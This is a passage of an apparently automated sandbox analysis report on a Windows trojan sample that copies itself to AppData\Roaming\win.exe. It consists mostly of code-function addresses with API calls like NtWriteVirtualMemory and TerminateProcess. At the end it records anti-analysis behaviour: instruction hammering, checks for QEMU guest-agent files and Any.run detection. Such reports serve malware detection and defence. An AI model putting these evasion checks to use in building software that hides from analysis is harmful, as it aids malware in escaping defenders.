            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B0F9B D3DKMTSetStablePowerState,TerminateProcess,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B4797 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B2FA8
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B8BBE NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B4BB0 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B0FEB D3DKMTSetStablePowerState,TerminateProcess,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B47F4 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B4C16 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B0C25 D3DKMTSetStablePowerState,TerminateProcess,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B104C D3DKMTSetStablePowerState,TerminateProcess,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B4847 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B8C44
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B0C5B D3DKMTSetStablePowerState,TerminateProcess,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B4C68 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B8C6D
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B3063
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B4899 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B1094 D3DKMTSetStablePowerState,TerminateProcess,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B0CA6 D3DKMTSetStablePowerState,TerminateProcess,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B10CB D3DKMTSetStablePowerState,TerminateProcess,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B44CF NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B0CC1 D3DKMTSetStablePowerState,TerminateProcess,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B30C4
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B8CDA
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B48E3 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B4CE4 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B60FA NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B28FE NtWriteVirtualMemory,LoadLibraryA,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B0CF3 D3DKMTSetStablePowerState,TerminateProcess,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B3114
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B8D14
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B4D2A NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B1120 D3DKMTSetStablePowerState,TerminateProcess,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B4520 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B4948 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B8D5C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B116C D3DKMTSetStablePowerState,TerminateProcess,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B317B
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B8D7E
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B4570 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B4D83 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B4985 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B0D91 D3DKMTSetStablePowerState,TerminateProcess,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B45B5 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B8DC3
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B4DE9 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B0DEF D3DKMTSetStablePowerState,TerminateProcess,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B45E0 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B45E4 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B45F9 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B8DFF
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B31F4
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B49F4 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B0CBA D3DKMTSetStablePowerState,NtWriteVirtualMemory,TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B1D2E NtWriteVirtualMemory,LoadLibraryA,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B4A27 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B4638 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B3E30 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B4E36 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B0E4D D3DKMTSetStablePowerState,TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B3244
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B7E78 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B4A73 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B3275
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B0E80 D3DKMTSetStablePowerState,TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B4A87 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B4E99 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B4694 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B4AA0 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B0EB3 D3DKMTSetStablePowerState,TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B46D3 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B1ED7 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B2B01 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B4B00 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B0F2F D3DKMTSetStablePowerState,TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B4B2D NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B4B25 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B2F3E NtWriteVirtualMemory,LoadLibraryA,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B4B5C NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B2F50
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B0F9B D3DKMTSetStablePowerState,TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B4797 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B2FA8
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B8BBE NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B4BB0 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B0FEB D3DKMTSetStablePowerState,TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B47F4 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B4C16 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B0C25 D3DKMTSetStablePowerState,TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B104C D3DKMTSetStablePowerState,TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B4847 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B8C44
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B0C5B D3DKMTSetStablePowerState,TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B4C68 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B8C6D
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B3063
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B4899 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B1094 D3DKMTSetStablePowerState,TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B0CA6 D3DKMTSetStablePowerState,TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B10CB D3DKMTSetStablePowerState,TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B44CF NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B0CC1 D3DKMTSetStablePowerState,TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B30C4
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B8CDA
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B48E3 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B4CE4 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B60FA NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B28FE NtWriteVirtualMemory,LoadLibraryA,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B0CF3 D3DKMTSetStablePowerState,TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B3114
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B8D14
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B4D2A NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B1120 D3DKMTSetStablePowerState,TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B4520 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B4948 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B8D5C
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B116C D3DKMTSetStablePowerState,TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B317B
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B8D7E
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B4570 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B4D83 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B4985 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B0D91 D3DKMTSetStablePowerState,TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B45B5 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B8DC3
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B4DE9 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B0DEF D3DKMTSetStablePowerState,TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B45E0 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B45E4 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B45F9 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B8DFF
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B31F4
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B49F4 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A0CBA D3DKMTSetStablePowerState,NtWriteVirtualMemory,TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A1D2E NtWriteVirtualMemory,LoadLibraryA,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4C68 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A8C6D
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A3063
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A0C5B D3DKMTSetStablePowerState,TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A104C D3DKMTSetStablePowerState,TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4847 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A8C44
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A0C25 D3DKMTSetStablePowerState,TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4C16 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A60FA NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A28FE NtWriteVirtualMemory,LoadLibraryA,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A0CF3 D3DKMTSetStablePowerState,TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A48E3 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4CE4 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A8CDA
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A10CB D3DKMTSetStablePowerState,TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A44CF NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A0CC1 D3DKMTSetStablePowerState,TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A30C4
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A0CA6 D3DKMTSetStablePowerState,TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4899 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A1094 D3DKMTSetStablePowerState,TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A317B
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A8D7E
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4570 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A116C D3DKMTSetStablePowerState,TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A8D5C
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4948 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4D2A NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A1120 D3DKMTSetStablePowerState,TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4520 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A3114
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A8D14
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A45F9 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A8DFF
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A31F4
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A49F4 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4DE9 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A0DEF D3DKMTSetStablePowerState,TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A45E0 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A45E4 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A8DC3
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A45B5 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A0D91 D3DKMTSetStablePowerState,TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4D83 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4985 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A7E78 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4A73 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A3275
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A0E4D D3DKMTSetStablePowerState,TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A3244
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4638 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A3E30 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4E36 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4A27 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A46D3 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A1ED7 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A0EB3 D3DKMTSetStablePowerState,TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4AA0 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4E99 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4694 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A0E80 D3DKMTSetStablePowerState,TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4A87 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4B5C NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A2F50
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A2F3E NtWriteVirtualMemory,LoadLibraryA,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A0F2F D3DKMTSetStablePowerState,TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4B2D NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4B25 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4B00 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A2B01 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A47F4 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A0FEB D3DKMTSetStablePowerState,TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A8BBE NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4BB0 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A2FA8
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A0F9B D3DKMTSetStablePowerState,TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4797 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B0CBA D3DKMTSetStablePowerState,NtWriteVirtualMemory,TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B1D2E NtWriteVirtualMemory,LoadLibraryA,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B4A27 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B4638 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B3E30 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B4E36 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B0E4D D3DKMTSetStablePowerState,TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B3244
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B7E78 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B4A73 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B3275
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B0E80 D3DKMTSetStablePowerState,TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B4A87 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B4E99 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B4694 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B4AA0 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B0EB3 D3DKMTSetStablePowerState,TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B46D3 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B1ED7 NtWriteVirtualMemory,
            Detected RDTSC dummy instruction sequence (likely for instruction hammering)
            Tries to detect Any.run
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeFile opened: C:\Program Files\qga\qga.exe
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeFile opened: C:\Program Files\qga\qga.exe
            Source: C:\Users\user\AppData\Roaming\win.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: C:\Users\user\AppData\Roaming\win.exeFile opened: C:\Program Files\qga\qga.exe
            Source: C:\Users\user\AppData\Roaming\win.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: C:\Users\user\AppData\Roaming\win.exeFile opened: C:\Program Files\qga\qga.exe
            Source: C:\Users\user\AppData\Roaming\win.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: C:\Users\user\AppData\Roaming\win.exeFile opened: C:\Program Files\qga\qga.exe
            Source: C:\Users\user\AppData\Roaming\win.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: C:\Users\user\AppData\Roaming\win.exeFile opened: C:\Program Files\qga\qga.exe
            Source: C:\Users\user\AppData\Roaming\win.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: C:\Users\user\AppData\Roaming\win.exeFile opened: C:\Program Files\qga\qga.exe
            Source: C:\Users\user\AppData\Roaming\win.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: C:\Users\user\AppData\Roaming\win.exeFile opened: C:\Program Files\qga\qga.exe
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
            Source: win.exe, 00000016.00000002.670753706.0000000002270000.00000004.00000001.sdmp, win.exe, 00000017.00000002.846427642.00000000006B0000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=WININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKO
